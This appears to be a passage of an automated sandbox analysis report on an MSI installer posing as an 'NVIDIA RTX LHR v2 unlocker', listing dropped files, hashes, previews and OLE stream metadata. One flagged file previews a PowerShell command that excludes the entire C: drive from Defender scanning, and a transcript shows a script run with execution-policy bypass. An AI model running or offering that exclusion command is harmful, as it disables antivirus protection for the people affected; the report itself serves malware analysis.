                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                  Malicious:false
                                  Preview:1
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:U:U
                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                  Malicious:false
                                  Preview:1
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:U:U
                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                  Malicious:false
                                  Preview:1
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:U:U
                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                  Malicious:false
                                  Preview:1
                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                  File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                  Category:dropped
                                  Size (bytes):5784
                                  Entropy (8bit):3.4920621874565785
                                  Encrypted:false
                                  SSDEEP:96:5wb5jTmmywV2BVrIovmkiGjxcj6BngOcvjb:5wbdTif/njVyvb
                                  MD5:FC1BB6C87FD1F08B534E52546561C53C
                                  SHA1:DB402C5C1025CF8D3E79DF7B868FD186243AA9D1
                                  SHA-256:A04750ED5F05B82B90F6B8EA3748BA246AF969757A5A4B74A0E25B186ADD520B
                                  SHA-512:5495F4AC3C8F42394A82540449526BB8DDD91ADF0A1A852A9E1F2D32A63858B966648B4099D9947D8AC68EE43824DACDA24C337C5B97733905E36C4921280E86
                                  Malicious:true
                                  Preview:..p.a.r.a.m.(..... . .[.a.l.i.a.s.(.".p.r.o.p.F.i.l.e.".).]. . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.O.u.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".p.r.o.p.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.K.V.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.F.i.l.e.".).]. . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.A.r.g.s.F.i.l.e.".).].[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.f.a.l.s.e.).].[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.A.r.g.s.F.i.l.e.P.a.t.h..... .,.[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. . . . . . . . . . . . . . . . . . . . . . . . . . .[.s.t.r.i.n.g.]. .$.t.e.s.t.P.r.e.f.i.x..... .,.[.s.w.i.t.c.h.]. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                  File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                  Category:dropped
                                  Size (bytes):120
                                  Entropy (8bit):3.430931929528047
                                  Encrypted:false
                                  SSDEEP:3:QVQlFc2TfSl5WLlgBI2Pv02qGKl+L9QlN6s9:QyXcnl5WmIW02qG/pwcs9
                                  MD5:2315AD4D342DA36907D6F4869069497B
                                  SHA1:5E3E895E13CEFA06D808F1C68F78C0CC36257399
                                  SHA-256:3CD5D3E66D38E6E65263815493D9E60E7F2B7409871849C9D59CFD114E4393FA
                                  SHA-512:6930FBB9E6E3905206B5294B1E54B200DCD66CBD29AD9136F166979B99381B53E0F61FE383BCE4552647B56AD601AD953F8577521AAFC4AA4B35408524A6DD55
                                  Malicious:true
                                  Preview:..p.o.w.e.r.s.h.e.l.l. .-.C.o.m.m.a.n.d. .A.d.d.-.M.p.P.r.e.f.e.r.e.n.c.e. .-.E.x.c.l.u.s.i.o.n.P.a.t.h. .".C.:.\.".....
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):865
                                  Entropy (8bit):5.4070958573132915
                                  Encrypted:false
                                  SSDEEP:24:BxSAQ1xvBnLx2DOXviNTTBP+7jJiX3Uu6WuHjeTKKjX4CIym1ZJXa:BZQHvhLoO/iBTFwjJuUwuqDYB1ZA
                                  MD5:28C57BA3B7B030A70108B8AF781422EB
                                  SHA1:68D31051121C9DB8F3442D8327BDF4D544B3A0B3
                                  SHA-256:BFE176E6456C0E5DF3681A93DEFF659AAC3890666B296ADB648F34BEFEE03F35
                                  SHA-512:5908FF1C3AFEB542ED1DD8556E29FC281562BC6C3C87923D48274D148B210586ECBE33CFE031B015DF71249E82FBED58FC571668D8C177F73A279A891961E07A
                                  Malicious:false
                                  Preview:.**********************..Windows PowerShell transcript start..Start time: 20220223185032..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 878411 (Microsoft Windows NT 10.0.17134.0)..Host Application: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\pss341F.ps1 -propFile C:\Users\user\AppData\Local\Temp\msi3350.txt -scriptFile C:\Users\user\AppData\Local\Temp\scr3351.ps1 -scriptArgsFile C:\Users\user\AppData\Local\Temp\scr3352.txt -propSep :<->: -testPrefix _testValue...Process ID: 7036..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..
                                  Process:C:\Windows\System32\msiexec.exe
                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {F58EB665-B875-433C-AEBE-8C055BEC1E2C}, Number of Words: 2, Subject: NVIDIA RTX LHR v2 unlocker, Author: Sergey, Name of Creating Application: NVIDIA RTX LHR v2 unlocker, Template: x64;2057, Comments: This installer database contains the logic and data required to install NVIDIA RTX LHR v2 unlocker., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                  Category:dropped
                                  Size (bytes):7207424
                                  Entropy (8bit):7.562593437382455
                                  Encrypted:false
                                  SSDEEP:196608:7+XqI6tGPI9Wo7x4dC29R/LcgZxVHh5J:7+aI6tGPI0k4YaB
                                  MD5:CA17C1BBEDC959AD89F1C1DBF6B7AA32
                                  SHA1:D24658FACE1F6FD3B457D7250C9B1A630798678D
                                  SHA-256:8FB46D2D56DD411AD10862204849ABF9A4546F1AB1D40BCB6B0CAC284DEBC055
                                  SHA-512:238F6E7B51A8D10B3828C3C9CEC4E24725B8A5D4503CD5B9EFF941906875057728DFD8D90DA456EDBB71A8FA8F68E60042961EE2AF56C0BC68F31F64FD066F6B
                                  Malicious:false
                                  Preview:......................>...................n.......................W...........I.......e.......6...7...8...9...:...;...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...,...-......./...c...d...e...f...g...h...i................................................... ...!..."................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...............................#...0........................................................................................... ...!..."...-.../...%...&...'...(...)...*...+...,...........1...5...A...2...3...4...7...6...>...8...9...:...;...<...=...H...?...@.......B...C...D...E...F...G...>...@.......K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                  Process:C:\Windows\System32\msiexec.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):408544
                                  Entropy (8bit):6.410598211463919
                                  Encrypted:false
                                  SSDEEP:6144:FwznG9uw/r8fyHQMNvrPGtPu4AO9k9ZeWYhEIho7bZQ:SG9TAVMlSn30Z0EIhgbZQ
                                  MD5:5D25243E90673C44AC420D69676F9062
                                  SHA1:23234013562F7EF738DB615246D391B8E191B475
                                  SHA-256:0DDB820918F3918496E414617536226AF08E27A7F13E5A58444F8DCF297A65D5
                                  SHA-512:47BA474912D8530FC78FD2C61572A3C9E91A27B1BDFAB08869A550AE0452298B3FF63A06B607BECA9D8DF56BCCC19B9720F5E1EC59EA5F3FD0F85C9762058FB9
                                  Malicious:false
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........0..c..c..c"..b..c"..bV.c...b..c...b..c...b..c"..b..c"..b..c"..b..c..c..cH..b..cH..b..cH.Sc..c..;c..cH..b..cRich..c........PE..L...G..a.........."!.........&............... ...............................`............@.........................@...................0............"..........\B...S..p...................@U......HT..@............ ..$............................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...0...........................@..@.reloc..\B.......D..................@..B........................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\System32\msiexec.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):408544
                                  Entropy (8bit):6.410598211463919
                                  Encrypted:false
                                  SSDEEP:6144:FwznG9uw/r8fyHQMNvrPGtPu4AO9k9ZeWYhEIho7bZQ:SG9TAVMlSn30Z0EIhgbZQ
                                  MD5:5D25243E90673C44AC420D69676F9062
                                  SHA1:23234013562F7EF738DB615246D391B8E191B475
                                  SHA-256:0DDB820918F3918496E414617536226AF08E27A7F13E5A58444F8DCF297A65D5
                                  SHA-512:47BA474912D8530FC78FD2C61572A3C9E91A27B1BDFAB08869A550AE0452298B3FF63A06B607BECA9D8DF56BCCC19B9720F5E1EC59EA5F3FD0F85C9762058FB9
                                  Malicious:false
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........0..c..c..c"..b..c"..bV.c...b..c...b..c...b..c"..b..c"..b..c"..b..c..c..cH..b..cH..b..cH.Sc..c..;c..cH..b..cRich..c........PE..L...G..a.........."!.........&............... ...............................`............@.........................@...................0............"..........\B...S..p...................@U......HT..@............ ..$............................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...0...........................@..@.reloc..\B.......D..................@..B........................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\System32\msiexec.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:modified
                                  Size (bytes):589280
                                  Entropy (8bit):6.56720964313755
                                  Encrypted:false
                                  SSDEEP:12288:LCtfiZk5vSCOJf0egTmTBBAkvAfFBtVLK+AfgTD0vEhWQsQT6cFsDw9gA:490P36htVLK+AfgTovcj2cF6w9gA
                                  MD5:3B340A09B1218A0E699D497E1651B366
                                  SHA1:B60163743239704D217C983F040DAF256EE31BCB
                                  SHA-256:462B7E38D364571DF6751FFC2624CC993F19025909CCE39801217267E544AAF2
                                  SHA-512:14E7A5E93F06DC74D6ADEA793F6E79DD44BB9C5E65288FC44E619A95E3DC45D93B3D58CD812846CE499AB93F87CF60F794CD4972F34732DF3B6A5721B6BFD725
                                  Malicious:false
                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........;...Z.J.Z.J.Z.J~(.K.Z.J~(.K.Z.J~(.K.Z.J./.K.Z.J./.K.Z.J..!J.Z.J./.K.Z.J~(.K.Z.J.Z.J.[.J./.K.Z.J./.K.Z.J./#J.Z.J.ZKJ.Z.J./.K.Z.JRich.Z.J........................PE..L......a.........."!.........Z......;........................................ ............@..........................o......,p...................................T......p...................@.......x...@...............L............................text............................... ..`.rdata..............................@..@.data................l..............@....rsrc...............................@..@.reloc...T.......V..................@..B........................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\System32\msiexec.exe
                                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):122558
                                  Entropy (8bit):5.3635233263223
                                  Encrypted:false
                                  SSDEEP:1536:iHzMV+f84vcIH17Yyxkjr0+NVRVle+yjeLWJOQzi7gZFOIKICh/81r8yQ1oXB4Hh:iHHJCoX5Ch
                                  MD5:CA1354FADB546AD9B3BFCF11E530A8E0
                                  SHA1:FBEC253189D62BFB3C42EB50C195D380F7C53E43
                                  SHA-256:284817E661E96F813EBFC20CFC991C7C3D72129E395D8BAFD24AFB898FF93EF8
                                  SHA-512:4B882C5B1A92EC59FF4BE87CE141578B0B06EA0099BF8D9606AFA2361204E22B33B642B5A59944ED42B17CD07115A44DB3E07608BDDC8F8F0C233CBA6ED9EED1
                                  Malicious:false
                                  Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..07/23/2020 10:13:25.847 [3928]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.Hosting, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.863 [3928]: ngen returning 0x00000000..07/23/2020 10:13:25.925 [1900]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.ServerDocument, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.925 [1900]: ngen returning 0x00000000..07/23/2020 10:13:25.972 [4436]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.v4.0.Framework, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /N
                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {F58EB665-B875-433C-AEBE-8C055BEC1E2C}, Number of Words: 2, Subject: NVIDIA RTX LHR v2 unlocker, Author: Sergey, Name of Creating Application: NVIDIA RTX LHR v2 unlocker, Template: x64;2057, Comments: This installer database contains the logic and data required to install NVIDIA RTX LHR v2 unlocker., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                  Entropy (8bit):7.562593437382455
                                  TrID:
                                  • Microsoft Windows Installer (77509/1) 52.18%
                                  • Windows SDK Setup Transform Script (63028/2) 42.43%
                                  • Generic OLE2 / Multistream Compound File (8008/1) 5.39%
                                  File name:LHRUnlocker Install.msi
                                  File size:7207424
                                  MD5:ca17c1bbedc959ad89f1c1dbf6b7aa32
                                  SHA1:d24658face1f6fd3b457d7250c9b1a630798678d
                                  SHA256:8fb46d2d56dd411ad10862204849abf9a4546f1ab1d40bcb6b0cac284debc055
                                  SHA512:238f6e7b51a8d10b3828c3c9cec4e24725b8a5d4503cd5b9eff941906875057728dfd8d90da456edbb71a8fa8f68e60042961ee2af56c0bc68f31f64fd066f6b
                                  SSDEEP:196608:7+XqI6tGPI9Wo7x4dC29R/LcgZxVHh5J:7+aI6tGPI0k4YaB
                                  File Content Preview:........................>...................n.......................W...........I.......e.......6...7...8...9...:...;...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...,...-......./...c...d...e...f...g...h...i......................................
                                  Icon Hash:a2a0b496b2caca72
                                  Document Type:OLE
                                  Number of OLE Files:1
                                  Has Summary Info:True
                                  Application Name:NVIDIA RTX LHR v2 unlocker
                                  Encrypted Document:False
                                  Contains Word Document Stream:False
                                  Contains Workbook/Book Stream:False
                                  Contains PowerPoint Document Stream:False
                                  Contains Visio Document Stream:False
                                  Contains ObjectPool Stream:
                                  Flash Objects Count:
                                  Contains VBA Macros:False
                                  Code Page:1252
                                  Title:Installation Database
                                  Subject:NVIDIA RTX LHR v2 unlocker
                                  Author:Sergey
                                  Keywords:Installer, MSI, Database
                                  Comments:This installer database contains the logic and data required to install NVIDIA RTX LHR v2 unlocker.
                                  Template:x64;2057
                                  Last Saved By:
                                  Revion Number:{F58EB665-B875-433C-AEBE-8C055BEC1E2C}
                                  Last Printed:2009-12-11 11:47:44.850000
                                  Create Time:2009-12-11 11:47:44.850000
                                  Last Saved Time:2020-09-18 14:06:51.913000
                                  Number of Pages:200
                                  Number of Words:2
                                  Creating Application:NVIDIA RTX LHR v2 unlocker
                                  Security:0
                                  General
                                  Stream Path:\x5SummaryInformation
                                  File Type:data
                                  Stream Size:596
                                  Entropy:4.74586135252
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . $ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . X . . . . . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . # . . W z . . @ . . . # . . W z . . @ . . . . _ . . . . . . . . . . . . . . . . . . . . . . . . . . ' . . . { F 5 8 E B 6 6 5 - B 8
                                  Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 24 02 00 00 10 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 01 00 00 00 b4 00 00 00 09 00 00 00 bc 00 00 00 0f 00 00 00 ec 00 00 00 03 00 00 00 f4 00 00 00 04 00 00 00 18 01 00 00
                                  General
                                  Stream Path:\x16786\x17522\x15550\x15884\x18327\x18152\x18472
                                  File Type:MS Windows icon resource - 4 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                  Stream Size:22257
                                  Entropy:4.03626304959
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . h . . . F . . . . . . . . ( . . . . . . . 0 0 . . . . . h & . . . . . . . . . . . . . . . . . > < . . ( . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  Data Raw:00 00 01 00 04 00 10 10 00 00 01 00 20 00 68 04 00 00 46 00 00 00 20 20 00 00 01 00 20 00 28 11 00 00 ae 04 00 00 30 30 00 00 01 00 20 00 68 26 00 00 d6 15 00 00 00 00 00 00 01 00 20 00 b3 1a 00 00 3e 3c 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  General
                                  Stream Path:\x17163\x16689\x18229\x15358\x17388\x15912\x16947\x16693\x17207\x17522\x18358\x17383\x18479
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Stream Size:407008
                                  Entropy:6.5620566215
                                  Base64 Encoded:True
                                  Data ASCII:M Z . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . . . . . ! . . L . ! T h i s p r o g r a m c a n n o t b e r u n i n D O S m o d e . . . . $ . . . . . . . . . . G . O . . . O . . . O . . . = . . . O . . . = . . l O . . . = . . . O . . . : . . . O . . . : . . . O . . . : . . . O . . b : . . . O . . b : . . . O . . . = . . . O . . . O . . . N . . b : . . . O . . b : . . . O . . b : S . . O . . . O ; . . O . .
                                  Data Raw:4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
                                  General
                                  Stream Path:\x17163\x16689\x18229\x15870\x18088
                                  File Type:MS Windows icon resource - 1 icon, 16x16, 16 colors
                                  Stream Size:318
                                  Entropy:2.03444158006
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . ( . . . . . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  Data Raw:00 00 01 00 01 00 10 10 10 00 00 00 00 00 28 01 00 00 16 00 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 04 00 00 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 c0 c0 c0 00 80 80 80 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00 00 00 ff 00 ff 00 ff ff 00 00 ff ff ff 00 00 00
                                  General
                                  Stream Path:\x17163\x16689\x18229\x15998\x18098\x17768\x17116\x17384\x16175\x17766\x17644\x15735\x17956\x16817\x16939\x18357\x17383\x18479
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Stream Size:589280
                                  Entropy:6.56720964314
                                  Base64 Encoded:True
                                  Data ASCII:M Z . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . L . ! T h i s p r o g r a m c a n n o t b e r u n i n D O S m o d e . . . . $ . . . . . . . . ; . . . Z . J . Z . J . Z . J ~ ( . K . Z . J ~ ( . K . Z . J ~ ( . K . Z . J . / . K . Z . J . / . K . Z . J . . ! J . Z . J . / . K . Z . J ~ ( . K . Z . J . Z . J . [ . J . / . K . Z . J . / . K . Z . J . / # J . Z . J . Z K J . Z . J . / . K . Z . J
                                  Data Raw:4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16190\x17010\x18103\x17764\x15208\x17896\x16808\x17591\x18357\x17383\x18479
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Stream Size:895968
                                  Entropy:6.44996656139
                                  Base64 Encoded:True
                                  Data ASCII:M Z . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . L . ! T h i s p r o g r a m c a n n o t b e r u n i n D O S m o d e . . . . $ . . . . . . . X . Z . . . 4 P . . 4 P . . 4 P . . 7 Q . . 4 P . . 1 Q . . 4 P N . 0 Q . . 4 P N . 7 Q . . 4 P N . 1 Q N . 4 P . . 0 Q . . 4 P . . 5 Q . . 4 P . . 5 P 1 . 4 P . . = Q , . 4 P . . 4 Q . . 4 P . . . P . . 4 P . . . P . . 4 P . . 6 Q . . 4 P R i c h . . 4 P
                                  Data Raw:4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16190\x17579\x17909\x17958\x15351\x16687\x17834\x16894\x17391
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Stream Size:288224
                                  Entropy:6.58114708933
                                  Base64 Encoded:True
                                  Data ASCII:M Z . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . L . ! T h i s p r o g r a m c a n n o t b e r u n i n D O S m o d e . . . . $ . . . . . . . . u S D A . . D A . . D A . . . 3 . . I A . . . 3 . . . A . . . 4 . . U A . . . 4 . . R A . . . 4 . . . A . . . 3 . . ] A . . . 3 . . E A . . . 3 . . U A . . D A . . . A . . . 4 . . _ A . . . 4 . . E A . . . 4 . . E A . . D A . . E A . . . 4 . . E A . .
                                  Data Raw:4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16318\x18483
                                  File Type:MS Windows icon resource - 1 icon, 16x16, 16 colors
                                  Stream Size:318
                                  Entropy:2.03693614652
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . ( . . . . . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  Data Raw:00 00 01 00 01 00 10 10 10 00 00 00 00 00 28 01 00 00 16 00 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 04 00 00 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 c0 c0 c0 00 80 80 80 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00 00 00 ff 00 ff 00 ff ff 00 00 ff ff ff 00 00 00
                                  General
